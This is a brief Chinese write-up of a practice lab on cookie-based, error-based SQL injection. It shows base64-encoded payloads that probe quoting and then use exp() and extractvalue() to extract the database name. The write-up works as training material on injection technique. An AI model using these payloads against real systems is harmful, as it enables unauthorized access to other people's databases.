知识点:
- cookie注入
- 报错注入
直接抓取对应的数据包,发现还是一个cookie注入
参数值被base64加密了
测试这里使用什么手段读取输入
构造payload:uname=1'
base64加密:MSc=
出现了hacker的页面,说明信息错误但是单引号没起作用
使用双引号试一下
构造payload:1"
base64加密:MSI=
出现了语法错误的报错信息,说明这里使用了双引号进行读取输入
测试是否可以进行错误注入
构造payload:1" or exp(710)#
base64加密:MSIgb3IgZXhwKDcxMCkj
成功回显exp()的错误信息
接下来获取数据库名
构造payload:1" or extractvalue(1,concat(0x7e,database(),0x7e))#
base64加密:MSIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSkj
成功获取到了数据库名;收工
10
